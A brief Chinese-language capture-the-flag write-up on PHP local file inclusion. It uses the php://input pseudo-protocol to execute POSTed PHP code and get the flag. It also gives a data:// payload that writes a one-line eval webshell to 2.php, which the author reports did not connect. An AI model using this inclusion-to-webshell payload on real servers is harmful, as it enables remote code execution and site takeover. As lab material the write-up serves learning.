文件包含和伪协议
用GET传入一个URL值,/?url=文件路径
伪协议php://input 用来执行PHP代码,将POST请求当作PHP代码执行
测试一下,可以正确解析
拿到FLAG
还有一种解法,写入一句话木马
#Payload
#把一句话木马写入2.phpdata://text/plain,<?php fputs(fopen('2.php','w'),'<?php @eval($_POST["cmd"]);?>');?>函数fputs将内容写入到指定文件,函数fopen打开文件,若没有就创建
把Payload放在/?url=后面,再访问/2.php
但不知为什么连不上
